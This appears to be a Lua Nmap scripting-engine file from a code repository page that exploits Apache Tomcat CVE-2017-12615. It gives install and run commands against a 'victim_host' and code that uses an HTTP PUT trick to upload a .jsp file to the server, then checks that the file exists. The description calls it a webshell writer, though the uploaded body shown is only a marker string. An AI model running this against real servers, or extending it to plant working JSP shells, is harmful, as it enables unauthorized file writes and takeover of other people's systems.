44 lines
1.0 KiB
Lua
44 lines
1.0 KiB
Lua
local stdnse = require "stdnse"
|
|
local http = require "http"
|
|
|
|
description = [[
|
|
for the vulnerability of tomcat-cve-2017-12615 This script will write a webshell into web server.
|
|
$ git clone https://github.com/Rvn0xsy/nse_vuln.git
|
|
$ cd /nse_vuln/
|
|
$ sudo cp * /usr/share/nmap/scripts/
|
|
$ sudo nmap -p 80,8080,8090,8899 --script XX.NSE victim_host
|
|
]]
|
|
|
|
prerule=function()
|
|
end
|
|
hostrule=function(host)
|
|
return false
|
|
end
|
|
|
|
portrule=function(host,port)
|
|
local ports = {80,8080,8090,8899}
|
|
for i in pairs(ports)do
|
|
if(port.number == ports[i])then
|
|
return true
|
|
end
|
|
end
|
|
end
|
|
|
|
|
|
action = function(host,port)
|
|
local shell_name = string.format("%sCVE-2017-12615-CHECK-%d.jsp","/",math.random(9999))
|
|
local status = stdnse.output_table()
|
|
local put_rsp = http.put(host,port,shell_name.."/",nil,"CVE-2017-12615")
|
|
if(put_rsp.status == 201)then
|
|
status.shell_name = shell_name
|
|
local response = http.get(host,port,shell_name)
|
|
if(response and http.response_contains(response,"CVE%-2017%-12615") )then
|
|
return status
|
|
end
|
|
return false
|
|
end
|
|
return false
|
|
end
|
|
postrule=function()
|
|
end
|